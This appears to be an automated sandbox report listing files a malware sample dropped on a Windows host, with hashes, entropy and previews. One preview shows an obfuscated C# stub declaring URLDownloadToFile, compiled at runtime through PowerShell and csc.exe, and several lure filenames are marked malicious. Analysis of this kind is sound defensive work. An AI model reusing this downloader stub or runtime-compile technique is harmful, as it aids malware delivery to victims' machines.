SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3CD8.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3D75.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3ECE.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4392.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES60DC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 18 19:36:57 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9934165075174137
Encrypted:	false
SSDEEP:	24:HSe9E2+fnsm+8XDfH+wKEbsmfII+ycuZhNsakSoPNnqSqd:gg8z9KPmg1ulsa3QqSK
MD5:	AB07F495CFBB9FE5FE0B527E29F7E29B
SHA1:	00E0D8D8570343BD749B4FA5CCD51C96BF03B428
SHA-256:	2103C3B050EB6AD85E885A690B6B69BF2C9C11885A63A822D51FCAE2DED8EF26
SHA-512:	FCADCAF504760E8BFC50F30ADB9F9E29378BF728DD8CE290B6F189D6457B9A284D9120B6730536C812B5AB3A7DACE6CC30E53B5E9173B2C1894B07269F83E43F
Malicious:	false
Preview:	L...Y.;g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP................vT..g...**S..............4.......C:\Users\user\AppData\Local\Temp\RES60DC.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.a.q.4.4.g.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kc10fnw.2f2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mihilty.hp2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ds4dfal.hjs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4enjthc.cok.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0xrpmcl.yt1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v55ixldz.4ru.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb0rsli5.wk5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfmfrl0q.rww.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfndyxbo.2df.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmbfz4vt.5qp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.08598028436621
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHrGak7YnqqSrXPN5Dlq5J:+RI+ycuZhNsakSoPNnqX
MD5:	F67654948167E4EEC62A2A539EB9A4FB
SHA1:	DC0CB54798F696B0592EEBE6B710EE97FF065A33
SHA-256:	ED79CA9EE9392E0512F3F89FF987CBC13644246757F2D7CFF7EEE5EFBCD2EEDA
SHA-512:	86F5A974370280DC56A214F95A62BF834C226469F5FC264C93D4F7FD5239C0EA937CB34003BDCDECA3FD511D64B30B17D75DDFBD12C77759BB3F7E052C178259
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.a.q.4.4.g.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.n.a.q.4.4.g.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
Category:	dropped
Size (bytes):	472
Entropy (8bit):	3.7725208644149166
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuE40zmMm/nQXReKJ8SRHy4H+J4EEJ4rNgueIy:V/DTLDfuER5XfHCzETueIy
MD5:	1A212B8A44924D84EEBA108F2409B5E8
SHA1:	B19066FAB9C3329CD206958DACEE65A08607586B
SHA-256:	977B687CCDCAEA25B4AFDD04DBAC19BF12B31AFAD4AE226D7B7E5ED5CABCF073
SHA-512:	4D4BBADA1880CE68CEEAFF34A1D412350F715C0F5F741F7F47692549280DC92738881CE1FFF7BBCD472610A63D99DED94CA713CC859B330A07D13DF2313EA453
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace lxsBtSMPv.{. public class dzTk. {. [DllImport("UrlMON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dnHrLo,string jlWMht,string L,uint UDwRBXCS,IntPtr qEKvq);.. }..}.

C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.229177665998413
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fpRB9n0zxs7+AEszIwkn23fpRBnH:p37Lvkmb6KRfBRBF0WZEifBRBH
MD5:	38CBF6328A801AC68F8165D7461836D5
SHA1:	2267DCEE38613D84BAA3190980321034884063CC
SHA-256:	F6E25D474D6DD0D75D2A284063BB4201873DF03A195F25A7EF5D87EF864A95C4
SHA-512:	9915EF6382E8C8E40C5D118FD05E897FA34B871A27B231E8C45825D0523FD0ECFEAF94BE56E2A09A900B815C1B094D22B2AAE9F99AEC23F709EDF9F32038EB26
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.0.cs"

C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8223730078480904
Encrypted:	false
SSDEEP:	24:etGSYPBu5exl8sMQgkg4qvPStZwtkZf9ANjcUWI+ycuZhNsakSoPNnq:6nsx+FT4CPStZXJiNA31ulsa3Qq
MD5:	EFAAD8992FA28BF3BAE7BBEA81A0D47C
SHA1:	FED7AC0477E089C3EE1B42B1BD9086CCB8D85520
SHA-256:	1642E0F75AAF02CA869425616EC18047F716A71B1D707AF6CE2B8D5E6A6F73F4
SHA-512:	7BEE2E665D9DD82DCE9BFFC2829BF101C6FFF208F58164E647CB9F412C70856240B2D9B4ABF705916AEE739ED50B0CC9BFBC27746D839ACA5BE5618D43B5E0E6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y.;g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....t.....t.......................................... =.....P ......O.........U.....\.....c.....e.....n...O.....O...!.O.....O.......!............=.......................................&..........<Module>.tn

C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
Category:	modified
Size (bytes):	867
Entropy (8bit):	5.316026316134132
Encrypted:	false
SSDEEP:	24:KJBqd3ka6KRfnBzEifnBOKax5DqBVKVrdFAMBJTH:Cika6CVEuUK2DcVKdBJj
MD5:	761D4E90E2F4CFC631CD04920570EA39
SHA1:	1D8931A82481C0D43722C745C1C5CD5DCF6E2829
SHA-256:	D6FA8F46C1FF92B69E7B358F89A5CADFF40C1FB4A15213160B70CA76001A11B6
SHA-512:	A727F5DE5DC60BD90716B048A0A8A24E62D5132FAC3602720CA4D1403755288BE80416C36F969B1AF53D9B19A87C604A072A25798D0A6D2A19141A4FE86BCAD2
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\djvbaae

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	56368
Entropy (8bit):	6.120994357619221
Encrypted:	false
SSDEEP:	768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
MD5:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
SHA1:	19DFD86294C4A525BA21C6AF77681B2A9BBECB55
SHA-256:	99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
SHA-512:	94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, Detection: malicious, Browse Filename: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, Detection: malicious, Browse Filename: invoice727282_PDF..exe, Detection: malicious, Browse Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse Filename: 6038732).vbs, Detection: malicious, Browse Filename: cirby0J3LP.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(......(....-...~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

C:\Users\user\AppData\Roaming\jjjwjwc

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	339146
Entropy (8bit):	7.999480831786925
Encrypted:	true
SSDEEP:	6144:1Dgj/nmaDvMESsqjdh+jmLmtjYTbUD+OHbP2ZnGVrSTdgTOK0Zws:8/jAESsqjj+jntjHP2puSrLF
MD5:	3D07318E14D6377E3ECD91C8BC6C59CC
SHA1:	E4D7E990439FA1B9EE79B50607EE6ADA2DFFD25D
SHA-256:	56EB8490E9F0B1A50F921E2F65F6AEA8F07B160055234EEF831210BD2BA27424
SHA-512:	B275ACF731567C5D9B26C387AC4687D86311724F2C1B1A7AF3691B73122E3D2597455D5CAC99F8285FE9E44CD572014ECEF809A8523C1F6491FA625096B4DB73
Malicious:	false
Preview:	.g?}..8h..>...\.....,...1...f.%.....1Ri.o.....&.w.y.E.F..,....,..m7a3.i.~.y..Iy...T...k1...Q0.(p..#'...@.G.e.u@...4...u.s...k'...<..bZ.sD.-.&..W.71d..H.^9G.GP...s..v.#..T........V.2..{t...{....{q..a".A".(:.b...]..'R!gX."(.=....\.aj...`J../.Ks ..X.c.Ce...y.....v)..............:..).4.@E.uV.0!..m....."...L'...d ....[..l..?Y..K......u...D.91..'.g....M.........g...L.c...pEi...k.;._.%...".......E.....=...t.eB\C..K.....9Gx.v.....j..x<.............c.9.... .@=.=.h.$.eJ.{H.N.....j....w.I......'......i.......3E....A....o....:....>q..Os/P.z.uC.\|`[......>...tG....X.AS.....IMwk..5\|.....#...z.dq...}....oFC...Y......)R. ...'J.s.........SU.J..rD.~.N..V.".~.~.j.."U)`..T......c[.KS..K....<.2.m.............r...(.:.X.....7.V.#Z......\|.....!.W/b....#.6%...H..e...n=41P.N."\|..Z ..b.....?).1..WC......h........x..xx.....+...,Q.....K.N.._=...7`.oR...X+..`;_..On.Y..8...d......"..x.u......5hs....F..S..}.L..u..j..\.d.d.v..../.._...}.;7...u7.f....Ru....=?e.

C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (377), with CRLF line terminators
Category:	dropped
Size (bytes):	141308
Entropy (8bit):	3.677460277464518
Encrypted:	false
SSDEEP:	1536:DBkSUTu5S/BV4Mf8mOZG3WVGwB7xW9xjqGuvcQ6T0+gt5pzBGwm:mSU/B2e8muG3WQwNjG4cQ6TZgt5p9Gwm
MD5:	855D024750A1BC1BC078E60C05E506E3
SHA1:	480C344EF4E060ADB7CA7E159C815CB38AC87614
SHA-256:	560327E8E4C818547FE966C8704D97270986B7457D62A154219E81ED4AFB4667
SHA-512:	64A68DD3C8750E7A90C95078DC1DB87086C546212B56348E6D45F4444B5DD7E6725F3B5DDBC2C414D08A7DF2FBF2EECD11B9AB414588AC7B66F57F70FBB85C94
Malicious:	true
